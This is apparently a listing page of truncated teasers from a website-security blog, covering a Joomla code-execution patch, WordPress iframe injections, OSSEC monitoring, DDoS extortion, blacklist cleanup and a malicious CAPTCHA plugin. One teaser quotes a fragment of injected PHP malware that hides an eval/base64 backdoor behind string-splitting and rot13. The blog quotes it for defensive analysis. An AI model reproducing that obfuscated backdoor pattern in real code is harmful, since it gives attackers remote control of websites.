The Joomla! team released a new version of Joomla! CMS yesterday to patch a serious and easy to exploit remote code execution vulnerability that affected…
Last March we described a WordPress attack that was responsible for hidden iframe injections that resembled Darkleech injections: declarations of styles with random names and…
We see quite a few sites with the following injected PHP code: //###=CACHE START=### error_reporting(0); $strings = “as”;$strings .= “sert”; @$strings(str_rot13(‘riny(onfr64_qrpbqr(“nJLtXTymp2I0XPEcLaLcXF…skipped…Tyvqwg9”));’)); //###=CACHE END=### This malware…
We leverage OSSEC extensively to help monitor and protect our servers. If you are not familiar with OSSEC, it is an open source Host-Based Intrusion Detection…
Over the past few months, our security operations group have identified and mitigated an increasing number of DDoS attacks tied to extortion attempts from different…
We frequently clean blacklisted websites and submit reconsideration requests to have them de-listed. We have encountered many kinds of blacklist warnings including search engines, anti-virus programs,…
Do you remember SweetCAPTCHA that tried to monetize its WordPress plugin injecting unwanted ads into web pages? Today we’ve found another CAPTCHA plugin with a…
Recently I analyzed a porn doorway script and found an interesting way to obfuscate an IP address there. $adr1 = “………………………………………………………………………………………………………………………………………………………..”; $adr2 = “………………………………………………………………………………………………………………………………………………………………………………………………………………..”; $adr3…